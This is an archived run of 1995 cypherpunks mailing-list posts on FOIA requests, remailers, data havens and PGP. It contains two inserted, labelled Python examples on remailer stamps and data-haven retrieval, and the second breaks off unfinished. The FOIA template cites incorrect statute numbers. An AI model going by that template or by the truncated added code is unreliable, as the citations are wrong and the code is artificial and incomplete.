/////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*---------------------------------------------------------*
Miyako Software is dedicated to creating freeware to help
make computers tools of personal liberation and expression.
for product info and PGP key, finger <tjbryce@amherst.edu>
                email: <tjb@acpub.duke.edu>
*---------------------------------------------------------*
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_/////////////////////////////


-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Thu, 12 Jan 95 21:19:50 PST
To: Syed Yusuf <yusuf921@uidaho.edu>
Subject: Re: FBI and BLACKNET
In-Reply-To: <Pine.HPP.3.91.950112170758.18085D-100000@goshawk.csrv.uidaho.edu>
Message-ID: <HeW5lKjqRyHD077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 12 Jan 1995 17:09:33 -0800 (PST), Syed Yusuf <yusuf921@uidaho.edu> wrote:
>
>
> On Wed, 11 Jan 1995, Samuel Kaplin wrote:
>
> > I hope they took you someplace nice for lunch...You might want to file a
> > FOI request on yourself, just to see how much they censor. ;) They might
> > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;)
> >
>
> For the benefit of myself and the list, how would you go about doing that?

Fill out this form letter, get it notarized and send it to the address in
the letterhead. Be prepared to wait and get jerked around. I have heard
that some FOI requests have taken as long as two years to get back.

Sam


                   PRIVACY ACT & FREEDOM OF INFORMATION ACT REQUEST

(date)


                        (requester's name and address)



        Federal Bureau of Investigation
        Records Management Division -
        FOIA/PA Office
        9th & Pennsylvania Avenue NW
        Washington, DC 20535

Gentlemen:

This is a request for records under the provisions of both the Privacy
Act (5 USC 552b) and the Freedom of Information Act (5 USC 522). This
request is being made under both Acts.

I hereby request one copy of any and all records about me or
referencing me maintained at the FBI. This includes (but should not be
limited to) documents, reports, memoranda, letters, electronic files,
database references, "do not file" files, photographs, audio tapes,
videotapes, electronic or photographic surveillance, "june mail", mail
covers, and other miscellaneous files, and index citations relating to
me or referencing me in other files.

My full name is:___________________________________
My date of birth was______________
My place of birth was:______________________________
My social security #:______________
I have lived in these places:



Other names, places, events, organizations or other references under
which you may find applicable records:



As you know, FOIA/PA regulations provide that even if some requested
material is properly exempt from mandatory disclosure, all segregable
portions must be released. If the requested material is released with
deletions, I ask that each deletion be marked to indicate the
exemption(s) being claimed to authorize each particular withholding.
In addition, I ask that your agency exercise its discretion to release
any records which may be technically exempt, but where withholding
serves no important public interest.

I hereby agree to pay reasonable costs associated with this request up
to a maximum of $25 without my additional approval. However, I
strongly request a fee waiver because this is, in part, a Privacy Act
request.

This letter and my signature have been certified by a notary public as
marked below.

Sincerely,




  _____________________________________________
          requester's signature




  _____________________________________________
          requester's printed name




  _____________________________________________
          notary stamp and signature



- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
       Ambition is a poor excuse for not having sense enough to be lazy.
                            -- Charlie McCarthy --

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@callisto.acpub.duke.edu (tjb)
Date: Thu, 12 Jan 95 20:56:57 PST
To: cypherpunks@toad.com
Subject: RELEASE: Secure Edit beta 0.5 (again!)
Message-ID: <199501130455.XAA28049@mail.duke.edu>
MIME-Version: 1.0
Content-Type: text/plain



I again apologize for sending this a THIRD time, but we all agree it's
important for PGP signatures to verify properly or people will get
sloppy about verifying them and expecting them to be valid. I strongly
suspect Eudora is doing some formatting of the email when I send it
with Eudora, so I'm sending this post through internews instead. This
really should work - I always paste it first in here, then check the
signature on the clipboard with macpgp. It checks out fine, but when I
send it to the list, the signature doesn't verify again.

Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 12 Jan 95 20:58:31 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: time stamping service (again)
In-Reply-To: <Pine.SUN.3.91.950112062429.3862C-100000@eskimo.com>
Message-ID: <m0rSZSa-0009v8C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> My PGP based time stamping service is back online.  I took it 
> down a while ago thinking the folks at notary.com (Digital 
> Time-Stamp, Inc.) were going to release their commercial 
...

This is elegant and great...

Why don't we add to the todo list the following:

Let's package up a number of the self-contained services, code, etc.
into a bundle that can be installed all at once (say on a Linux
system :-) ) and call it the 'CypherStation' release.

We can try to reach a consensus for standard service naming/access
methods and create a federation of these things.

It should have minimize bandwidth, minimize cpu, minimize storage
levels of service to allow different levels of users to have
different possible impact on the machine.  (Ie. : local, paying,
regional, unknown, domain, etc.)

I know that those of us running Internet services would devote
a little of our imaginary free time.

We could have a string to identify available services and versions:
CypherStation/.01/Serv:RTAmAh1.3  Where each service could have 
versions that differed from the release.

Just some raw thought.

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant      510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua M. Sled" <jsled@eis.calstate.edu>
Date: Fri, 13 Jan 95 00:25:06 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Remailer@jpunix.com down!!!???
In-Reply-To: <V5Z5lKjqRuNT077yn@mirage.skypoint.com>
Message-ID: <Pine.3.89.9501130030.A28258-0100000@eis.calstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Jan 1995, Samuel Kaplin wrote:

> I just read that the remailer at jpunix.com went down suddenly and
> permanently. Anyone know what happened?? I also believe the whole site is
> down as it didn't answer my pings a couple of days ago.

He was getting spam from AOL at the rate of 25 messages every 5 
seconds... so he took the system down.

Joshua M. Sled <jsled@free.org/jsled@ctp.org>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:53:06 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
Message-ID: <ab3935ef000210047747@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Pierre Uszynski writes:
>Doug Barnes said:
<SNIP>
>Same here, but from the other tack: "Remailer Guild??? Give me a
>break :-)" My problem with the idea of "Guild" (or any quasi
>general agreement) of remailer operators is that:
>
>On the one side:
>- The whole idea of using a remailer chain comes from distrust of
>the operators. The operators should be the ones to distrust each other
>the most.

I agree. There should be minimal cooperation between remailer operators.
They should work together on standards and policies to ensure the free flow
of messages.  They should not be afforded an opportunity to conspire.

<SNIP>
>Pierre.
>pierre@shell.portal.com

Observation:
Most complaints to remailers come from news posts. Only a small fraction from
direct mail. (Is this the experience of the other operators?)

Suggestion:
Pay the first and last remailers in the chain.
The first remailer knows who you are. You simply
purchase an account from him. He provides support and
user friendly utilities...
Block all posts from normal remailers.
News posts only allowed from pseudonym servers like omega.c2.org.
The user uses e-cash, or greenbacks in an envelope, to buy an
account on the nym server.

All email from other remailers, and to any address is free.

Thoughts?
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxOHzVVkk3dax7hlAQGnfQP9HJG+O/L/+L9hGqZ6xYqfmJh30Kwli7r6
BTEck7NwJ1W3gk6IpLy+NG4l/v8HCEyWvQGHYsGcBJkl+y6i2otb8Y6Bec25xntZ
KlfwNi6UON5rpnP8+EFolcolfb9OpEIMhfirzu07jVkM72mUBp7IAzFZjZ2NTUY+
oLDCa0V2EWg=
=0TTW
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:53:11 PST
To: Jurgen Botz <cypherpunks@toad.com
Subject: Re: Remailer postage
Message-ID: <ab393fa201021004be3f@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>jpb@gate.net wrote:
>> Where can I get the Magic Money software?
>
>I'm a bit behind, so sorry if others have already suggested this, but
>you should need any digicash for this... stamps can be just big random
>numbers.  Someone buys a book of stamps, you make 10 big random
>numbers, send them a copy and keep a copy on file.  After a message
>comes through with a particular number you throw that number out.
>
>Just like real stamps, and unlike money, they can be used only once.

However I now can recognize which messages are yours. If I work with
another operator, I can eliminate all the remailers between us for purposes
of traffic analysis.
-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxOPhFVkk3dax7hlAQEy7AP+NZOV8cZ94VfInTy5RHKasPOxrmBzcy9k
Bc1nqyK95ae4mr+XWNBBpqjL4FQBwTpnSVI+eVAnTd9QWK9XND3YN8M9PdzzM8zF
qdrB4I7aB29AJsenQWD1zujZDNLwMaaRxDYe47xR5vD+o7LIUMHxBvveLllp0pAM
Ek2wjwQhezI=
=PsFM
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
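
Added example (not part of the original message, and not code from any remailer): the number-stamp scheme from the quoted text next to a blind-signed variant, to show the ledger linkage the reply objects to. The blinded variant goes beyond what the thread spells out; the class names, the toy RSA key and the buyer and message labels are assumptions made for illustration.

```python
import hashlib
import math
import secrets


def digest(stamp: str) -> bytes:
    return hashlib.sha256(stamp.encode()).digest()


class NumberStampIssuer:
    """Stamps are plain random numbers the operator keeps on file."""

    def __init__(self):
        self.unspent = {}   # sha256(stamp) -> buyer, recorded at sale time
        self.seen = []      # (buyer, message_id): what the operator learns

    def sell_book(self, buyer, count=10):
        book = [secrets.token_hex(16) for _ in range(count)]
        for stamp in book:
            self.unspent[digest(stamp)] = buyer
        return book

    def redeem(self, stamp, message_id):
        buyer = self.unspent.pop(digest(stamp), None)  # pop: valid only once
        if buyer is None:
            return False                               # unknown or already used
        self.seen.append((buyer, message_id))          # message tied to buyer
        return True


# Toy RSA key (assumption for the demo; far too small for real use).
P, Q = 2**61 - 1, 2**89 - 1          # two Mersenne primes
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


def stamp_to_int(stamp: str) -> int:
    return int.from_bytes(digest(stamp), "big") % N


class BlindStampIssuer:
    """Operator signs blinded values, so a sale cannot be matched to a stamp."""

    def __init__(self):
        self.sales = []     # (buyer, blinded value): all the operator sees
        self.spent = set()
        self.seen = []      # message_ids only; there is no buyer to record

    def sign_blinded(self, buyer, blinded):
        self.sales.append((buyer, blinded))
        return pow(blinded, D, N)

    def redeem(self, stamp, signature, message_id):
        if pow(signature, E, N) != stamp_to_int(stamp):
            return False                               # not signed by this key
        if digest(stamp) in self.spent:
            return False                               # single use
        self.spent.add(digest(stamp))
        self.seen.append(message_id)
        return True


def buy_blind_stamp(issuer, buyer):
    """Buyer side: pick the stamp, blind it, have it signed, unblind."""
    stamp = secrets.token_hex(16)
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            break
    blinded = (stamp_to_int(stamp) * pow(r, E, N)) % N
    signature = (issuer.sign_blinded(buyer, blinded) * pow(r, -1, N)) % N
    return stamp, signature


if __name__ == "__main__":
    plain = NumberStampIssuer()
    book = plain.sell_book("alice")
    print(plain.redeem(book[0], "msg-1"), plain.redeem(book[0], "msg-2"))
    print(plain.seen)       # the buyer's name sits next to the message

    blind = BlindStampIssuer()
    stamp, sig = buy_blind_stamp(blind, "alice")
    print(blind.redeem(stamp, sig, "msg-1"), blind.redeem(stamp, sig, "msg-2"))
    print(blind.seen)       # message ids only
```

Blinding removes only the ledger link: the operator still knows who bought stamps and still sees when each message arrives.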






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:54:17 PST
To: cypherpunks@toad.com
Subject: Re: Remailer source
Message-ID: <ab39403202021004e041@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


>Octavian  Ureche <tavi@info.polymtl.ca> wrote:
>
>> Does anybody know where could I find UNIX sources
>> for a remailer ?
>

Try mixmaster. I can not post the path for export reasons. Mail me if you
want it. It runs on Sparc. Does not run on Linux and FreeBSD. All others
unknown.

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Fri, 13 Jan 95 00:04:29 PST
To: cypherpunks@toad.com
Subject: Remailer@jpunix.com down!!!???
Message-ID: <V5Z5lKjqRuNT077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



I just read that the remailer at jpunix.com went down suddenly and
permanently. Anyone know what happened?? I also believe the whole site is
down as it didn't answer my pings a couple of days ago.

Sam

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
             A man without a God is like a fish without a bicycle.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxYycclnXxBRSgfNAQFh8wf9HR9KCppQV5Li70ggDPQ0hTEuUU6Cl3BS
m0N4Mx/6bu3OWIyh5XkpBfNSNhvixkSR7UJ2LtqugXAxsfYiYQw+uw2vd1i3rK8k
VYuqWYgWh8uu+xNIoTXN7MdosuGoG/+eglVWW5SuZNxpVO5ggVq7KqDjTTtHjpSC
TPBwJbSELoMIQbcFfvbA5EgaMVqdVbf1xXxUVLIguh0AreX75gPMPVPzwS9+xOMs
BgB/UgsC+XGWYhCH7EjiAF0tPE+MBRkVkQVfCEo1Hk9CrafMUHYIWPzwu/sirq3v
vhoZxurEYA6Fr2sbCOtlPGXKv3UAELmU+h7b+vO4CKu6OCn1XhgZmg==
=uFxE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <root@nesta.pr.mcs.net>
Date: Fri, 13 Jan 95 00:02:25 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <199501121637.IAA00893@largo.remailer.net>
Message-ID: <Pine.3.89.9501130154.B28998-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Eric Hughes wrote:

>    why would you give the haven owner free run?  I mean naturally he does 
>    have free run with your data once he gets it, 
> 
> That's exactly the reason, namely, to make the agreement between
> individuals match the underlying nature of information.  This is
> different in the trust in silence about the user.  This is also not to
> say that the operator can't undertake to make assurances about where
> bits go and don't go.
>
Are you saying that there is an agreement between the data haven operator 
and the user?  If so, that's one of the things I was attempting to point 
out in that reply.  I think the agreement, whether it is a contract, not 
likely, or a sense of trust is extremely important to the data-haven.
 
>    I am sure you 
>    wouldn't want your data stored on a public access Unix system, or in 
>    plaintext.
> 
> So don't store it in plaintext.  The operator of the data storage
> facility has no responsibility for this.
> 
Right now we are getting into so many fraggin different definitions of 
data haven, that this conversation is looping over itself infinitely.  In 
one sort of data Haven, the operator does have a responsibility to keep 
the data private, yet on another, he doesn't have the responsibility, it 
all depends on what the aims and views and goals of the DataHaven are.  
And since we have not yet agreed on what a data Haven.....we get usenet 
run-around.  

>    if the datahaven is turned into a data broker
> 
> I don't know about you, but I don't like paying money for random bits.
> 
This ties into the above line, maybe you aren't just sending encrypted 
data, maybe you're selling secrets to a datahaven operator, who is 
offshore, or who has the money to pay you now, and also the structure set up 
to receive, transmit, and take payment and pay for that secret data, or 
valuable info.  Once again I think that we are working with multiple 
definitions of DataHaven here, and it is leading to confusions.

>    well what would be the purpose of this data haven you propose except as an 
>    extra storage space for data, like if you don't have space on your own 
>    drive?
> 
> Even when you've got enough of your own disk space, it's still subject
> to failure.  Putting data in multiple places reduces the possibility
> of unrecoverable catastrophe.
> 
There are already services much better equipped to deal with this problem, 
although, I am unsure if any of them are crypto-aware as of yet.  Something 
to look into.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <root@nesta.pr.mcs.net>
Date: Fri, 13 Jan 95 00:13:56 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Data Havens..A consumer perspective
In-Reply-To: <ab3b21760302100490ca@[132.162.201.201]>
Message-ID: <Pine.3.89.9501130117.C28998-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Jan 1995, Jonathan Rochkind wrote:

> At 4:30 AM 01/12/95, Nesta Stubbs wrote:
> You shouldn't ever give the operator the info in plaintext. Encrypt it,
> public or otherwise, and distribute the key to your Band of Merry Men.
> Then it doesn't matter even if it's sitting on a public access Unix system, no
> one can read it anyhow.  The main point of this kind of data haven seems to
> be providing you a remote location to store your data, in an anonymous way,
> so even if it does end up being found out, you can't be linked to it.  I
> wouldn't trust the operator to do anything particular with the data other
> than keep it safe enough so I can retrieve it later, and I'd take the
> necessary precautions to account for that lack of trust. The only reason
> I'd trust him to even keep it safe for me, is because of reputation market.
> If he routinely loses people's data, word is going to get around. On the
> other hand, if he routinely shows people's data to the FBI, no one is even
> going to know about it. I don't trust him not to routinely show the data to
> the FBI, or store it in public.  Use encryption.
>
First note that in Carol Ann's post she previously said it doesn't matter 
to her how the data is transported, and thus it could be in plaintext, I 
made.  And also that she said that the operator should be able to specify 
how it was transmitted.

Once again we're running with different definitions of data haven.  I see 
the data haven as more than just a place to safely store data if it's 
encrypted, I see it capable of a lot of other things, like acting as a 
central point to BlackNet type operation, with the proper structure set 
up to carry out the transactions with safety, or relative safety.  Also, 
as an anonymous drop box type of place, I can then send my encrypted data 
to the data haven, and let them hold it until some anonymous client or 
employer and I complete an agreed upon contract and both give word to the 
data haven to complete its part of the contract, whether it is allowing 
the other person to now access that encrypted information, or doing a 
monetary transaction with net-cash or whatever.  Also, as a data base of 
illegal information, like old credit records and such.

> Of course there are different purposes for data havens, which would require
> more trust of the operator.  But I'm not sure how well those are ever going
> to work, because I'd much rather trust my encryption than trust the
> operator.
>
Agreed. There are also other operations besides data storage that can be 
protected by your own crypto, and only use the data haven as a mid-point.

Argh, I'm sorry for the poor typing in this letter, and the other one I 
sent to Eric on this subject, it's really late and I am dogged, just got 
done 9 hours of work.  But this topic is so interesting for me I couldn't 
resist.  Tomorrow if I get a chance I will attempt to outline what *I* 
think of when I am saying data haven, maybe it will help us be more 
productive, not that we aren't doing that now...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 23:11:35 PST
To: cypherpunks@toad.com
Subject: signature business for secure edit release announce
Message-ID: <v01510104ab3bd86b254f@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


I'm not going to waste any more bandwidth sending the announcement (sorry),
but here's how you can validate the signature if you'd like to.

If you'd like to verify the signature on the announcement for secure edit,
please finger me at tjbryce@amherst.edu. In my plan is contained the
announcement with a valid signature from Miyako Software's public key.

Even though I had "treat source file as text" selected, I think there must
have been left over some weird character in there that is not transmitted
through email properly. What I did to get the signature to validate was
place the announcement in my plan at amherst.edu, finger myself, copy the
signed announcement, detach the invalid signature with mac pgp, sign the
leftover text and copy just the resulting signature, log back onto amherst,
and I edited the plan.txt file, pasting the new signature onto where the
old signature used to be. FINALLY WORKED!

Sincere apologies for using THREE TIMES the bandwidth the message actually
needed, and not even getting it to work at that. Thanks to Bill Evans for
checking out the signature and noticing it was invalid.

Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 12 Jan 95 23:44:32 PST
To: crunch@well.sf.ca.us (John Draper)
Subject: Re: Some PGP problems
In-Reply-To: <199501130551.VAA01278@well.sf.ca.us>
Message-ID: <199501130743.CAA24613@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	There are two versions of MacPGP that use RSAREF, and are thus
legal & kosher, plus ViaCrypt's.  The free ones are MIT, and 2.6.2ca.
The MIT one doesn't support Apple Events.  The Apple event supporting
PGPs can be driven by a menu interface called the MacPGP kit. 2.3 is
not fully compatible with 2.6; I use 2.6.2 with the kit.

MIT: telnet net-dist.mit.edu, login as getpgp
server.netcom.com:/pub/gr/grady/PGP/MacPGP262b1.2.sea.hqx.asc)
duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPKit.hqx

	You were supposed to use gunzip (GNU's unzip) to unzip, but
StuffIt Deluxe will handle it; just tell StuffIt it's a zipped file.

Crunch asked:

| I learn that Mac PGP2.3 exists,  but NO version 2.6
| exists for the Mac.   Is that true?    If not,  then
| where can I get a copy,  so I can decode a message
| created with 2.6?    If ver 2.3 will decode a message
| encoded with 2.6,  then I'm faced with how I can
| extract this Mac file which has a .gz extension.
| Binhex don't seem to decode it.  So,  I now got this
| file named "macpgp2.3.cpt.hqx.gz" on my Mac.    Was
| I supposed to have used some special UNIX utility to
| convert the .gz thingie first?    Please enlighten
| this confused cypherpunker!!! :-)   Or will I even have
| to do all of this because 2.3 is incompatible with 2.6.


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Fri, 13 Jan 95 06:12:09 PST
To: cypherpunks@toad.com
Subject: Windows Eudora PGP/remailer add-on
Message-ID: <199501131412.AA12078@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm working on a pre-mailer/PGP shell that works with Eudora for Windows.
You compose the mail in the shell, encrypt it, specify remailer(s), and it
transfers the message back to Eudora.

It's called Private Idaho.  Anonymous FTP from ftp.eskimo.com
/joelm/pidaho11.zip.

There were some problems with the loading routine in version 1.0, but
hopefully I've fixed them in this version.

Any comments, requests, bug reports appreciated.

Joel McNamara
joelm@eskimo.com - finger for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael L. Acklin" <hroller@metronet.com>
Date: Fri, 13 Jan 95 05:23:39 PST
To: marko@millcomm.com
Subject: PGP and Windows
Message-ID: <Pine.HPP.3.90.950113071701.27484A-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark,
	I saw your message on Cypherpunks List and noticed that you were 
using WinEudora. My question is do you know of a program that will do 
encryption with PGP on the fly within Windows. 
	I know how to encrypt a file and attach it to a message. And I 
have both WinPGP 2.6 and WinPGP 1.0. Both only encrypt files. Any help 
would greatly be appreciated. Thanks in Advance....

Mike Acklin  ---------------> hroller@metronet.com
Pub Key available at MIT Key Server.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Fri, 13 Jan 95 07:06:19 PST
To: "Joshua M. Sled" <jsled@eis.calstate.edu>
Subject: Re: Remailer@jpunix.com down!!!???
In-Reply-To: <Pine.3.89.9501130030.A28258-0100000@eis.calstate.edu>
Message-ID: <199501131505.JAA05109@jpunix.com>
MIME-Version: 1.0
Content-Type: text/x-pgp


-----BEGIN PGP SIGNED MESSAGE-----

In message <Pine.3.89.9501130030.A28258-0100000@eis.calstate.edu> you write:
>On Fri, 13 Jan 1995, Samuel Kaplin wrote:
>
>> I just read that the remailer at jpunix.com went down suddenly and
>> permanently. Anyone know what happened?? I also believe the whole site is
>> down as it didn't answer my pings a couple of days ago.
>
>He was getting spam from AOL at the rate of 25 messages every 5 
>seconds... so he took the system down.
>
>Joshua M. Sled <jsled@free.org/jsled@ctp.org>

The remailer is gone but jpunix is up. I took it down for about half a
day a couple of days ago to massage the filesystems. The keyserver is
alive and well and open to public use.

 John A. Perry - KG5RG - perry@jpunix.com
 WWW - http://jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 PGP-encrypted e-mail welcome!
 
 Finger kserver@jpunix.com for PGP keyserver help.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxaWpFOTpEThrthvAQEy6QP/b0d3UB8gnrfDaDpGjajfqipDWcpR4Xyr
IMCjg1X5xqmEe7mmX2EeQSUqR/0QudzoD0N1/Xx4tcMGZp4k8jePQaY8XL/Xbs1j
7mtBiFBuyLQ0Rbv73mv7maNu7qsUGiy2v9/wJGoNtcpRTDJKj/8Mf/68jU6wTITj
1/JXZ9H3M94=
=55y/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 09:48:25 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501122233.OAA02325@ix3.ix.netcom.com>
Message-ID: <199501131746.JAA02913@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: daleh@ix.netcom.com (Dale Harrison (AEGIS))

   Paco begins by 
   inventing the new [format] of which only Paco knows the internals.

Fine.  The operator has no idea of how to make sense of this data
format.  Just because someone in the world has an interpretation for
it doesn't mean that I do.

No operator of any data service can be expected to know about every
data interpretation.  The key here is "good faith".  An operator can
undertake a good faith effort to remain ignorant about content.

The argument that "it passed the filter, so it's approved" is bogus.
The counter is that "it passed the filter, so I personally have no
idea what's inside it."  Knowledge here is personal specific
knowledge, not an acknowledgement of a possibility.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 09:51:59 PST
To: cypherpunks@toad.com
Subject: Re: Microsoft TrueName (tm) (fwd)
In-Reply-To: <v01510104ab3b6305a759@DialupEudora>
Message-ID: <199501131750.JAA02922@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: rah@shipwright.com (Robert Hettinga)

   Eric, what'll you take for "remailer.net"? ;-).

Addresses under remailer.net will be available to operators of
approved remailers.  Approved is yet to be defined, so no one could
possibly satisfy the conditions for it yet.

In the meanwhile, I'm using it as a vanity license plate.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 09:54:19 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <v02110100ab3b6fb73f29@[129.219.97.131]>
Message-ID: <199501131752.JAA02925@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Ben.Goren@asu.edu

   Here's a solution:

What problem, pray tell, does this solve?  It seems far more
complicated than it need be.

   Alice sends a file to Dave's DataHaven. When Alice wants her file back, she
   sends to Dave a secure hash of the file, a key with which to decrypt it,
   and a handful of plaintext at the beginning of the file. Dave decrypts the
   file that matches the hash with the key Alice gave him; if the file begins
   as Alice says it should, Dave returns the file to Alice.

Eric
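
Added example (not part of the original message): the retrieval check from the quoted proposal, with Dave's side written out. The SHA-256 keystream cipher is a stand-in chosen so the code runs with the standard library only, and the class name, the 16-byte minimum prefix and the sample plaintext are assumptions.

```python
import hashlib
import hmac
import secrets

MIN_PREFIX = 16   # assumed size of the "handful of plaintext", in bytes


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher: XOR with SHA-256(key || counter). The same call
    encrypts and decrypts. There is no nonce, so use one key per file."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


class DataHaven:
    """Dave's side: stores opaque bytes indexed by their hash."""

    def __init__(self):
        self.files = {}     # sha256(ciphertext) hex digest -> ciphertext

    def deposit(self, ciphertext: bytes) -> str:
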